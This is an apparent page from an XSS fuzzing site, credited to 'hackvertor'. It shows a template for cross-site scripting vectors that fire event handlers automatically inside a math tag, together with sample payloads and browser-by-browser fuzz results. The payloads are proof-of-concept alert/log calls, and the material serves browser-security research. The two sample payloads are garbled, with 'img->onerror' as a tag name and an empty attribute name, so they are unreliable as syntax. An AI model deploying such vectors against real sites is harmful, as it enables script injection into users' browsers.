XSS vectors that execute automatically inside math
1
1
1
1This vector shows which events fire without user interaction inside a math tag
Created byhackvertor
Created Apr 17, 2024
Updated May 25, 2025
Detecting browser...
CategoryURL Handling
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml
$[data2] placeholderevents
Template used:
<math><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>0x0D
<math><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>Sample payloads
<math><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></math>0x0D
<math><img->onerror ="alert('img->onerror->')"></img->onerror></math>Fuzz results
Chrome 145.0.0.0 desktop Windows NT 10.0
Updated17 Feb 2026
Found 1 result
Loading...
Chrome 143.0.0.0 desktop macOS 10.15.7older version
Updated31 Jan 2026
Found 1 result
Loading...
Chrome 124.0.0.0 Unknown Unknownolder version
Updated24 Apr 2024
Found 1 result
Loading...
Firefox 148.0 desktop Windows NT 10.0
Updated23 Feb 2026
Found 1 result
Loading...
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated18 Feb 2026
Found 1 result
Loading...
Safari 17.4.1 Unknown Unknown
Updated17 Apr 2024
Found 1 result
Loading...